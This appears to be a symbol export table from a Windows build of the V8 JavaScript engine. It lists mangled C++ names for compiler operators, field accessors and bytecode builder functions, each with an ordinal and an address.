                                                                                                                                                                                                                                    ?Float64LessThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67590x1410aa690
                                                                                                                                                                                                                                    ?Float64LessThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@0@Z67600x1410aa6f0
                                                                                                                                                                                                                                    ?Float64LessThanOrEqual@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67610x1410e2af0
                                                                                                                                                                                                                                    ?Float64LessThanOrEqual@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67620x141052350
                                                                                                                                                                                                                                    ?Float64LessThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67630x1410aa760
                                                                                                                                                                                                                                    ?Float64Log10@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z67640x1410aa7c0
                                                                                                                                                                                                                                    ?Float64Log10@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67650x141052360
                                                                                                                                                                                                                                    ?Float64Log10@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z67660x1410aa820
                                                                                                                                                                                                                                    ?Float64Log1p@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z67670x1410aa860
                                                                                                                                                                                                                                    ?Float64Log1p@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67680x141052370
                                                                                                                                                                                                                                    ?Float64Log1p@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z67690x1410aa8c0
                                                                                                                                                                                                                                    ?Float64Log2@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z67700x1410aa900
                                                                                                                                                                                                                                    ?Float64Log2@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67710x141052380
                                                                                                                                                                                                                                    ?Float64Log2@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z67720x1410aa960
                                                                                                                                                                                                                                    ?Float64Log@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z67730x1410aa9a0
                                                                                                                                                                                                                                    ?Float64Log@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67740x141052390
                                                                                                                                                                                                                                    ?Float64Log@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z67750x1410aaa00
                                                                                                                                                                                                                                    ?Float64Max@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z67760x1410aaa40
                                                                                                                                                                                                                                    ?Float64Max@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67770x1410523a0
                                                                                                                                                                                                                                    ?Float64Max@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67780x1410aaab0
                                                                                                                                                                                                                                    ?Float64Min@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z67790x1410aab10
                                                                                                                                                                                                                                    ?Float64Min@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67800x1410523b0
                                                                                                                                                                                                                                    ?Float64Min@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67810x1410aab80
                                                                                                                                                                                                                                    ?Float64Mod@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z67820x1410aabe0
                                                                                                                                                                                                                                    ?Float64Mod@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67830x1410e2b70
                                                                                                                                                                                                                                    ?Float64Mod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67840x1410523c0
                                                                                                                                                                                                                                    ?Float64Mod@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67850x1410aac50
                                                                                                                                                                                                                                    ?Float64Mul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z67860x1410aacb0
                                                                                                                                                                                                                                    ?Float64Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67870x1410523d0
                                                                                                                                                                                                                                    ?Float64Mul@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z67880x1411caea0
                                                                                                                                                                                                                                    ?Float64Mul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67890x1410aad20
                                                                                                                                                                                                                                    ?Float64Neg@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z67900x1410aad80
                                                                                                                                                                                                                                    ?Float64Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67910x1410523e0
                                                                                                                                                                                                                                    ?Float64Neg@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z67920x1410aade0
                                                                                                                                                                                                                                    ?Float64NotEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@0@Z67930x1410aae20
                                                                                                                                                                                                                                    ?Float64NotEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67940x1410aaea0
                                                                                                                                                                                                                                    ?Float64OperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z67950x141254f30
                                                                                                                                                                                                                                    ?Float64Pow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z67960x1410aaf00
                                                                                                                                                                                                                                    ?Float64Pow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ67970x1410523f0
                                                                                                                                                                                                                                    ?Float64Pow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z67980x1410aaf70
                                                                                                                                                                                                                                    ?Float64PowHalf@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z67990x1411caf00
                                                                                                                                                                                                                                    ?Float64Round@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z68000x1411f6800
                                                                                                                                                                                                                                    ?Float64RoundDown@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68010x1410aafd0
                                                                                                                                                                                                                                    ?Float64RoundDown@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68020x1410e2bf0
                                                                                                                                                                                                                                    ?Float64RoundDown@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68030x141052400
                                                                                                                                                                                                                                    ?Float64RoundDown@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68040x1410ab030
                                                                                                                                                                                                                                    ?Float64RoundTiesAway@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68050x141052420
                                                                                                                                                                                                                                    ?Float64RoundTiesAway@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68060x1410ab080
                                                                                                                                                                                                                                    ?Float64RoundTiesEven@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68070x1410ab0d0
                                                                                                                                                                                                                                    ?Float64RoundTiesEven@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68080x141052440
                                                                                                                                                                                                                                    ?Float64RoundTiesEven@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68090x1410ab130
                                                                                                                                                                                                                                    ?Float64RoundTruncate@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68100x1410ab180
                                                                                                                                                                                                                                    ?Float64RoundTruncate@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68110x1410e2c90
                                                                                                                                                                                                                                    ?Float64RoundTruncate@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68120x141052460
                                                                                                                                                                                                                                    ?Float64RoundTruncate@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68130x1410ab1e0
                                                                                                                                                                                                                                    ?Float64RoundUp@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68140x1410ab230
                                                                                                                                                                                                                                    ?Float64RoundUp@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68150x141052480
                                                                                                                                                                                                                                    ?Float64RoundUp@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68160x1410ab290
                                                                                                                                                                                                                                    ?Float64Select@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ68170x1410524a0
                                                                                                                                                                                                                                    ?Float64Select@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@00@Z68180x1410ab2e0
                                                                                                                                                                                                                                    ?Float64Sign@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z68190x1411f69b0
                                                                                                                                                                                                                                    ?Float64SilenceNaN@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68200x1410ab350
                                                                                                                                                                                                                                    ?Float64SilenceNaN@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68210x1410e2d30
                                                                                                                                                                                                                                    ?Float64SilenceNaN@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68220x1410524c0
                                                                                                                                                                                                                                    ?Float64SilenceNaN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68230x1410ab3b0
                                                                                                                                                                                                                                    ?Float64Sin@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68240x1410ab3f0
                                                                                                                                                                                                                                    ?Float64Sin@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68250x1410524d0
                                                                                                                                                                                                                                    ?Float64Sin@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68260x1410ab450
                                                                                                                                                                                                                                    ?Float64Sinh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68270x1410ab490
                                                                                                                                                                                                                                    ?Float64Sinh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68280x1410524e0
                                                                                                                                                                                                                                    ?Float64Sinh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68290x1410ab4f0
                                                                                                                                                                                                                                    ?Float64Sqrt@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68300x1410ab530
                                                                                                                                                                                                                                    ?Float64Sqrt@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68310x1410524f0
                                                                                                                                                                                                                                    ?Float64Sqrt@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68320x1410ab590
                                                                                                                                                                                                                                    ?Float64Sub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@0@Z68330x1410ab5d0
                                                                                                                                                                                                                                    ?Float64Sub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z68340x1410e2d90
                                                                                                                                                                                                                                    ?Float64Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68350x141052500
                                                                                                                                                                                                                                    ?Float64Sub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z68360x1410ab640
                                                                                                                                                                                                                                    ?Float64Tan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68370x1410ab6a0
                                                                                                                                                                                                                                    ?Float64Tan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68380x141052510
                                                                                                                                                                                                                                    ?Float64Tan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68390x1410ab700
                                                                                                                                                                                                                                    ?Float64Tanh@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V534@@Z68400x1410ab740
                                                                                                                                                                                                                                    ?Float64Tanh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68410x141052520
                                                                                                                                                                                                                                    ?Float64Tanh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z68420x1410ab7a0
                                                                                                                                                                                                                                    ?Float@AsmType@wasm@internal@v8@@SAPEAV1234@XZ68430x14072f9c0
                                                                                                                                                                                                                                    ?FloatQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ68440x14072f9d0
                                                                                                                                                                                                                                    ?FloatQDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ68450x140582230
                                                                                                                                                                                                                                    ?FloatUnop@?$SharedTurboAssemblerBase@VTurboAssembler@internal@v8@@@internal@v8@@AEAAXVXMMRegister@23@0VRegister@23@P8SharedTurboAssembler@23@EAAX00VOperand@23@@ZVExternalReference@23@@Z68460x1405f0340
                                                                                                                                                                                                                                    ?Floatish@AsmType@wasm@internal@v8@@SAPEAV1234@XZ68470x14072f9e0
                                                                                                                                                                                                                                    ?FloatishDoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ68480x1403bb570
                                                                                                                                                                                                                                    ?FloodWithOneShot@Debug@internal@v8@@AEAAXV?$Handle@VSharedFunctionInfo@internal@v8@@@23@_N@Z68490x140bba730
                                                                                                                                                                                                                                    ?Flush@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXXZ68500x140a37ef0
                                                                                                                                                                                                                                    ?Flush@OptimizingCompileDispatcher@internal@v8@@QEAAXW4BlockingBehavior@23@@Z68510x140bd7e60
                                                                                                                                                                                                                                    ?FlushICache@CpuFeatures@internal@v8@@CAXPEAX_K@Z68520x1400971a0
                                                                                                                                                                                                                                    ?FlushInputQueue@OptimizingCompileDispatcher@internal@v8@@AEAAXXZ68530x140bd7f00
                                                                                                                                                                                                                                    ?FlushInstructionCache@internal@v8@@YAXPEAX_K@Z68540x140bfa8b0
                                                                                                                                                                                                                                    ?FlushInstructionCache@internal@v8@@YAX_K0@Z68550x1405597b0
                                                                                                                                                                                                                                    ?FlushMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMajorNonAtomicMarkingState@23@@Z68560x140b427c0
                                                                                                                                                                                                                                    ?FlushNativeContexts@ConcurrentMarking@internal@v8@@QEAAXPEAVNativeContextStats@23@@Z68570x140b42900
                                                                                                                                                                                                                                    ?FlushOutputQueue@OptimizingCompileDispatcher@internal@v8@@AEAAX_N@Z68580x140bd7fa0
                                                                                                                                                                                                                                    ?FlushQueues@OptimizingCompileDispatcher@internal@v8@@AEAAXW4BlockingBehavior@23@_N@Z68590x140bd8060
                                                                                                                                                                                                                                    ?FlushWrapperCacheIfFull@ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@AEAAXXZ68600x140b3abc0
                                                                                                                                                                                                                                    ?FoldConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ68610x14103a760
                                                                                                                                                                                                                                    ?For@ConsumedPreparseData@internal@v8@@SA?AV?$unique_ptr@VConsumedPreparseData@internal@v8@@U?$default_delete@VConsumedPreparseData@internal@v8@@@std@@@std@@PEAVIsolate@23@V?$Handle@VPreparseData@internal@v8@@@23@@Z68620x1408b6890
                                                                                                                                                                                                                                    ?For@ConsumedPreparseData@internal@v8@@SA?AV?$unique_ptr@VConsumedPreparseData@internal@v8@@U?$default_delete@VConsumedPreparseData@internal@v8@@@std@@@std@@PEAVLocalIsolate@23@V?$Handle@VPreparseData@internal@v8@@@23@@Z68630x1408b68b0
                                                                                                                                                                                                                                    ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVExternalSourceStream@ScriptCompiler@3@W4Encoding@StreamedSource@63@@Z68640x140889f20
                                                                                                                                                                                                                                    ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@@Z68650x14088a1a0
                                                                                                                                                                                                                                    ?For@ScannerStream@internal@v8@@SAPEAVUtf16CharacterStream@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@HH@Z68660x14088a1b0
                                                                                                                                                                                                                                    ?For@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z68670x140c82b30
                                                                                                                                                                                                                                    ?For@Type@compiler@internal@v8@@SA?AV1234@AEBVMapRef@234@@Z68680x14057ee90
                                                                                                                                                                                                                                    ?ForApi@Private@v8@@SA?AV?$Local@VPrivate@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z68690x140c82b70
                                                                                                                                                                                                                                    ?ForApi@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@V?$Local@VString@v8@@@2@@Z68700x140c82bb0
                                                                                                                                                                                                                                    ?ForArgumentsCallee@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68710x141215f50
                                                                                                                                                                                                                                    ?ForArgumentsLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68720x141215f90
                                                                                                                                                                                                                                    ?ForBigIntBitfield@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68730x141215fd0
                                                                                                                                                                                                                                    ?ForBigIntLeastSignificantDigit64@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68740x141216030
                                                                                                                                                                                                                                    ?ForBigIntOptionalPadding@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68750x141216090
                                                                                                                                                                                                                                    ?ForCellValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68760x1412160f0
                                                                                                                                                                                                                                    ?ForConsStringFirst@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68770x141216130
                                                                                                                                                                                                                                    ?ForConsStringSecond@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68780x141216170
                                                                                                                                                                                                                                    ?ForContextSlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z68790x1412161b0
                                                                                                                                                                                                                                    ?ForContextSlotKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_K@Z68800x1412161f0
                                                                                                                                                                                                                                    ?ForDescriptorArrayEnumCache@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68810x141216230
                                                                                                                                                                                                                                    ?ForDictionaryNextEnumerationIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68820x141216270
                                                                                                                                                                                                                                    ?ForDictionaryObjectHashIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68830x1412162c0
                                                                                                                                                                                                                                    ?ForEachTransitionTo@TransitionsAccessor@internal@v8@@QEAAXVName@23@AEBV?$function@$$A6AXVMap@internal@v8@@@Z@std@@PEAV?$CombinationAssertScope@V?$PerThreadAssertScopeDebugOnly@$0A@$0A@@internal@v8@@V?$PerThreadAssertScopeDebugOnly@$00$0A@@23@@23@@Z68840x1408d4220
                                                                                                                                                                                                                                    ?ForEnumCacheIndices@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68850x141216230
                                                                                                                                                                                                                                    ?ForEnumCacheKeys@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68860x141216310
                                                                                                                                                                                                                                    ?ForExternalIntPtr@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68870x141216350
                                                                                                                                                                                                                                    ?ForExternalStringResourceData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68880x141216390
                                                                                                                                                                                                                                    ?ForFeedbackCellInterruptBudget@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68890x1412163d0
                                                                                                                                                                                                                                    ?ForFeedbackVectorClosureFeedbackCellArray@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68900x141216430
                                                                                                                                                                                                                                    ?ForFeedbackVectorFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68910x141216470
                                                                                                                                                                                                                                    ?ForFeedbackVectorInvocationCount@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68920x1412164d0
                                                                                                                                                                                                                                    ?ForFeedbackVectorSlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@H@Z68930x141216530
                                                                                                                                                                                                                                    ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ElementsKind@34@@Z68940x141216570
                                                                                                                                                                                                                                    ?ForFixedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ68950x141216660
                                                                                                                                                                                                                                    ?ForFixedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ68960x141216690
                                                                                                                                                                                                                                    ?ForFixedArraySlot@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@_KW4WriteBarrierKind@234@@Z68970x1412166f0
                                                                                                                                                                                                                                    ?ForFixedDoubleArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ68980x141216730
                                                                                                                                                                                                                                    ?ForFunctionCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VSharedFunctionInfo@23@@Z68990x1408c8a30
                                                                                                                                                                                                                                    ?ForHashTableBaseCapacity@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69000x141216770
                                                                                                                                                                                                                                    ?ForHashTableBaseNumberOfDeletedElement@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69010x1412167c0
                                                                                                                                                                                                                                    ?ForHashTableBaseNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69020x141216810
                                                                                                                                                                                                                                    ?ForHeapNumberValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69030x141216860
                                                                                                                                                                                                                                    ?ForInContinue@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0@Z69040x140a5dd70
                                                                                                                                                                                                                                    ?ForInEnumerate@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z69050x140a5dd90
                                                                                                                                                                                                                                    ?ForInEnumerate@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ69060x1410c4a00
                                                                                                                                                                                                                                    ?ForInNext@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@0VRegisterList@234@H@Z69070x140a5df10
                                                                                                                                                                                                                                    ?ForInNext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@AEBUFeedbackSource@234@@Z69080x1410c4a10
                                                                                                                                                                                                                                    ?ForInPrepare@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegisterList@234@H@Z69090x140a5dfd0
                                                                                                                                                                                                                                    ?ForInPrepare@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ForInMode@234@AEBUFeedbackSource@234@@Z69100x1410c4ae0
                                                                                                                                                                                                                                    ?ForInStep@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z69110x140a5e1b0
                                                                                                                                                                                                                                    ?ForJSArrayBufferBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69120x1412168c0
                                                                                                                                                                                                                                    ?ForJSArrayBufferViewBuffer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69130x141216920
                                                                                                                                                                                                                                    ?ForJSArrayBufferViewByteLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69140x141216960
                                                                                                                                                                                                                                    ?ForJSArrayBufferViewByteOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69150x1412169c0
                                                                                                                                                                                                                                    ?ForJSArrayIteratorIteratedObject@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69160x141216a20
                                                                                                                                                                                                                                    ?ForJSArrayIteratorKind@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69170x141216a60
                                                                                                                                                                                                                                    ?ForJSArrayIteratorNextIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69180x141216ac0
                                                                                                                                                                                                                                    ?ForJSArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4ElementsKind@34@@Z69190x141216b20
                                                                                                                                                                                                                                    ?ForJSAsyncFunctionObjectPromise@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69200x141216bc0
                                                                                                                                                                                                                                    ?ForJSAsyncGeneratorObjectIsAwaiting@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69210x141216c00
                                                                                                                                                                                                                                    ?ForJSAsyncGeneratorObjectQueue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69220x141216c50
                                                                                                                                                                                                                                    ?ForJSBoundFunctionBoundArguments@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69230x141216c90
                                                                                                                                                                                                                                    ?ForJSBoundFunctionBoundTargetFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69240x141216ce0
                                                                                                                                                                                                                                    ?ForJSBoundFunctionBoundThis@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69250x141215f50
                                                                                                                                                                                                                                    ?ForJSCollectionIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69260x141216d20
                                                                                                                                                                                                                                    ?ForJSCollectionIteratorTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69270x141216920
                                                                                                                                                                                                                                    ?ForJSCollectionTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69280x141216920
                                                                                                                                                                                                                                    ?ForJSDataViewDataPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69290x141216d80
                                                                                                                                                                                                                                    ?ForJSDateField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@W4FieldIndex@JSDate@34@@Z69300x141216dc0
                                                                                                                                                                                                                                    ?ForJSDateValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69310x141216e00
                                                                                                                                                                                                                                    ?ForJSFunctionCode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69320x141216e60
                                                                                                                                                                                                                                    ?ForJSFunctionContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69330x141216ea0
                                                                                                                                                                                                                                    ?ForJSFunctionFeedbackCell@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69340x141216c90
                                                                                                                                                                                                                                    ?ForJSFunctionPrototypeOrInitialMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69350x141216ef0
                                                                                                                                                                                                                                    ?ForJSFunctionSharedFunctionInfo@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69360x141216920
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69370x141216ea0
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectContinuation@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69380x141216f30
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectFunction@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69390x141216f80
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectInputOrDebugPos@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69400x141216fc0
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectParametersAndRegisters@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69410x141217000
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectReceiver@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69420x141216c90
                                                                                                                                                                                                                                    ?ForJSGeneratorObjectResumeMode@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69430x141217050
                                                                                                                                                                                                                                    ?ForJSGlobalProxyNativeContext@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ69440x1412170a0
